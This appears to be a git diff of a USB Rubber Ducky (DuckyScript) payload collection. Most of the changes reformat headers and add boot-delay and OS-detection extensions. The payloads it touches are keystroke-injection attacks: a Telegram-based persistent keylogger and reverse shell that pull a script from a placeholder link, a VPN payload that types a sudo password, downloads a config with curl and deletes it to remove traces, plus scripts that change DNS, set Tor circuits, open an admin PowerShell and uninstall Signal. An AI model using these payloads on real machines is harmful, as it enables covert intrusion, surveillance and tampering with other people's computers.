$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN notepad.exe
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ##################################################################
|
||||
REM # |
|
||||
REM # Title : Make Windows performant (but ugly and boring) |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ##################################################################
|
||||
REM_BLOCK
|
||||
##################################################################
|
||||
# #
|
||||
# Title : Make Windows performant (but ugly and boring) #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
##################################################################
|
||||
END_REM
|
||||
|
||||
REM Plug-And-Play <3
|
||||
|
||||
|
@ -16,7 +18,48 @@ REM - Nothing
|
|||
REM Note:
|
||||
REM - Payload tested on Windows 11 Eng
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
GUI r
|
||||
DELAY 2000
|
||||
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ########################################################
|
||||
REM # #
|
||||
REM # Title : Persistent Keylogger - Telegram Based #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : Execution #
|
||||
REM # Target : Linux #
|
||||
REM # #
|
||||
REM ########################################################
|
||||
REM_BLOCK
|
||||
########################################################
|
||||
# #
|
||||
# Title : Persistent Keylogger - Telegram Based #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
########################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
|
@ -14,7 +16,33 @@ REM - Internet Connection
|
|||
REM Here you must put your own file link
|
||||
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ############################################################
|
||||
REM # #
|
||||
REM # Title : Persistent Reverse Shell - Telegram Based #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : Execution #
|
||||
REM # Target : Linux #
|
||||
REM # #
|
||||
REM ############################################################
|
||||
REM_BLOCK
|
||||
############################################################
|
||||
# #
|
||||
# Title : Persistent Reverse Shell - Telegram Based #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
############################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
|
@ -14,7 +16,33 @@ REM - Internet Connection
|
|||
REM Here you must put your own file link
|
||||
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
REM ########################################################
|
||||
REM # |
|
||||
REM # Title : Send Email Through Thunderbird |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 - Linux(debian tested) |
|
||||
REM # |
|
||||
REM ########################################################
|
||||
|
||||
REM_BLOCK
|
||||
########################################################
|
||||
# #
|
||||
# Title : Send Email Through Thunderbird #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 - Linux(debian tested) #
|
||||
# #
|
||||
########################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
|
|
|
@ -1,22 +1,64 @@
|
|||
REM ############################################################
|
||||
REM # |
|
||||
REM # Title : Send Messages In Discord Channel-Server |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ############################################################
|
||||
|
||||
REM_BLOCK
|
||||
############################################################
|
||||
# #
|
||||
# Title : Send Messages In Discord Channel-Server #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
############################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet connection
|
||||
REM - Discord Installed
|
||||
|
||||
|
||||
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
|
||||
DEFINE #CHAT_NAME example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Open Discord app
|
||||
GUI
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
|
||||
REM ####################################
|
||||
REM # |
|
||||
REM # Title : Set Arbitrary VPN |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ####################################
|
||||
REM_BLOCK
|
||||
####################################
|
||||
# #
|
||||
# Title : Set Arbitrary VPN #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
####################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
|
@ -15,44 +16,57 @@ REM - Internet Connection
|
|||
REM - 'openvpn' installed
|
||||
|
||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
DEFINE #SUDO_PASS example
|
||||
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
|
||||
DEFINE VPN_FILE_LINK example.com
|
||||
DEFINE #VPN_FILE_LINK example.com
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
STRING sudo su
|
||||
ENTER
|
||||
STRINGLN sudo su
|
||||
DELAY 1000
|
||||
STRING SUDO_PASS
|
||||
ENTER
|
||||
STRINGLN #SUDO_PASS
|
||||
DELAY 1000
|
||||
|
||||
|
||||
REM #### VPN SECTION ####
|
||||
|
||||
|
||||
STRING curl
|
||||
STRING VPN_FILE_LINK
|
||||
STRING > vpn_configuration.ovpn
|
||||
ENTER
|
||||
STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
|
||||
REM It depends by the internet connection
|
||||
DELAY 2000
|
||||
|
||||
STRING openvpn vpn_configuration.ovpn
|
||||
STRINGLN openvpn vpn_configuration.ovpn
|
||||
REM It depends by the computer power
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRING rm vpn_configuration.ovpn
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
REM_BLOCK
|
||||
################################################################
|
||||
# |
|
||||
# Title : Set An Arbitrary And Persistent Tor Circuit |
|
||||
# Author : Aleff |
|
||||
# Version : 1.0 |
|
||||
# Category : Execution |
|
||||
# Target : Windows 10/11; Linux; |
|
||||
# |
|
||||
# #
|
||||
# Title : Set An Arbitrary And Persistent Tor Circuit #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11; Linux; #
|
||||
# #
|
||||
################################################################
|
||||
|
||||
Requirements:
|
||||
|
|
|
@ -1,24 +1,65 @@
|
|||
REM ########################################################
|
||||
REM # |
|
||||
REM # Title : Set An Arbitrary DNS (IPv4 version) |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 11 |
|
||||
REM # |
|
||||
REM ########################################################
|
||||
|
||||
REM_BLOCK
|
||||
########################################################
|
||||
# #
|
||||
# Title : Set An Arbitrary DNS (IPv4 version) #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 11 #
|
||||
# #
|
||||
########################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing
|
||||
|
||||
|
||||
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
|
||||
DEFINE DNS example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Open Settings
|
||||
DELAY 1000
|
||||
GUI
|
||||
DELAY 1000
|
||||
STRING settings
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ###################################
|
||||
REM # |
|
||||
REM # Title : Set Tor Bridge |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ###################################
|
||||
REM_BLOCK
|
||||
###################################
|
||||
# #
|
||||
# Title : Set Tor Bridge #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
###################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Tor installed
|
||||
|
|
|
@ -1,17 +1,61 @@
|
|||
REM ####################################################################################
|
||||
REM # |
|
||||
REM # Title : Starting a PowerShell with administrator permissions in Windows |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ####################################################################################
|
||||
REM_BLOCK
|
||||
####################################################################################
|
||||
# #
|
||||
# Title : Starting a PowerShell with administrator permissions in Windows #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
####################################################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI x
|
||||
DELAY 500
|
||||
STRING a
|
||||
|
|
|
@ -1,28 +1,68 @@
|
|||
|
||||
REM #####################################################
|
||||
REM # |
|
||||
REM # Title : Stop A Single Process In Windows |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM #####################################################
|
||||
|
||||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Stop A Single Process In Windows #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing
|
||||
|
||||
|
||||
REM Write the name of the process that you want to stop
|
||||
DEFINE PROCESS_NAME example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Open Task Manager
|
||||
GUI
|
||||
DELAY 1000
|
||||
STRING Task Manager
|
||||
ENTER
|
||||
STRINGLN Task Manager
|
||||
DELAY 1000
|
||||
|
||||
REM Goto search bar
|
||||
|
@ -36,9 +76,7 @@ TAB
|
|||
DELAY 500
|
||||
|
||||
REM Write the process name
|
||||
STRING PROCESS_NAME
|
||||
DELAY 500
|
||||
ENTER
|
||||
STRINGLN PROCESS_NAME
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM #######################################################
|
||||
REM # |
|
||||
REM # Title : Telegram Persistent Connection Linux |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM #######################################################
|
||||
REM_BLOCK
|
||||
#######################################################
|
||||
# #
|
||||
# Title : Telegram Persistent Connection Linux #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
#######################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
|
@ -14,7 +16,34 @@ REM - Internet Connection
|
|||
REM Here you must put your own file link
|
||||
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM #####################################
|
||||
REM # |
|
||||
REM # Title : Uninstall Signal |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM #####################################
|
||||
REM_BLOCK
|
||||
#####################################
|
||||
# #
|
||||
# Title : Uninstall Signal #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
#####################################
|
||||
END_REM
|
||||
|
||||
REM Plug-And-Play <3
|
||||
|
||||
|
@ -14,11 +16,52 @@ REM Requirements:
|
|||
REM - Signal App installed
|
||||
REM - ExecutionPolicy Bypass
|
||||
|
||||
DELAY 2000
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Stop-Process -Name "Signal"
|
||||
|
|
|
@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
|
|||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Instagram
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Discord
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ##############################################################################
|
||||
REM # |
|
||||
REM # Title : Uninstall A Specific App On Windows Through Control Panel |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ##############################################################################
|
||||
REM_BLOCK
|
||||
##############################################################################
|
||||
# #
|
||||
# Title : Uninstall A Specific App On Windows Through Control Panel #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
##############################################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
|
||||
|
@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
|
|||
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
|
||||
DEFINE #APP_NAME example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
